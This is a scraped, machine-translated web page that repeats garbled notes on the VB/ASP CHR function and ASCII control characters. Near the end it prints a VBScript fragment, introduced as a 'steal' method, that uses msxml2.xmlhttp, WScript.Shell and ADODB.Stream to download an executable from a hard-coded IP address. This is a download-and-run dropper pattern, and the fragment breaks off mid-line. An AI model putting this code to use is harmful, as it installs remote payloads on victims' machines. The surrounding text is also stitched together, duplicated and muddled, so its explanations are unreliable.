Return result of the CHR function: Return string, which contains the specified characterCodeRelated characters.
The CHR ("0") is a string of 0 characters.
CHR ("1 ")
CHR ("2 ")
CHR ("3 ")
CHR ("4 ")
CHR ("5 ")
CHR ("6 ")
CHR ("7")
CHR (9), CHR (10), CHR (13), CHR (32), CHR (34)
All ASCII code tables: [url] http://www.asciitable.com/#/url]
CHR (13) is a carriage return
CHR (10) is a line break
CHR (32) is a space character
9 \ 34 is a tab, not sure?
The following are some
http://blog.csdn.net/cunxiyuan108/article/details/5989701CHR (CharCode)The necessary charcode parameter is a Long that is used to identify a character. Charcode:ascii yardsEach word has its own ASCII To know the ASCII code of a word, write a VB
The CHR function returns: A String that contains the characters associated with the specified character code.Chr ("0") is a 0 characterCHR ("1")CHR ("2")CHR ("3")CHR ("4")CHR ("5")CHR ("6")CHR ("7") bellsCHR ("8") back latticeCHR ("9") tab
Chr (9), Chr (10), Chr (13), Chr (32), Chr (34)All About ASCII code table: [Url]http://www.asciitable.com/[/url]Chr (13) is a carriage returnCHR (10) is a newline character.Chr (32) is a spaces9\34 is tab, not OK?Here are some of the columns
Chr (13) is a carriage return Chr (10) is a newline character Chr (32) is a spaces 9\34 is tab, not OK?
Chr (13) is a carriage return Chr (10) is a newline character Chr (32) is a spaces 9\34 is tab, not OK?
Here are some of the columns
Chr (13) is a carriage return; Chr (10) is a line break; chr (32) is a space character; chr (13) is a carriage return; 9 \ 34 is a tab, not sure?
(Example: replace all carriage returns with
# Replace (foo, Chr (13), "", "ALL ")#
)
All tables
cookie| Script | solve | problem
The Self.window way to see the wings of lustIn fact, I've always had a way to never tell anyone:Played for a long time to announce the hehe:aspsky 3.0 Steal---c.z.y original Set send address: ▲ Send address form like:
Set post = Createobject ("msxml2.xmlhttp ")
Set shell = Createobject ("wscript. Shell ")
Post. Open "get", "http: // 202.75.208.29/calc.exe", 0
Post. Send ()
Set aget = Createobject ("ADODB. Stream ")
Aget. mode = 3
Aget. type = 1
Aget. open ()
Aget.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.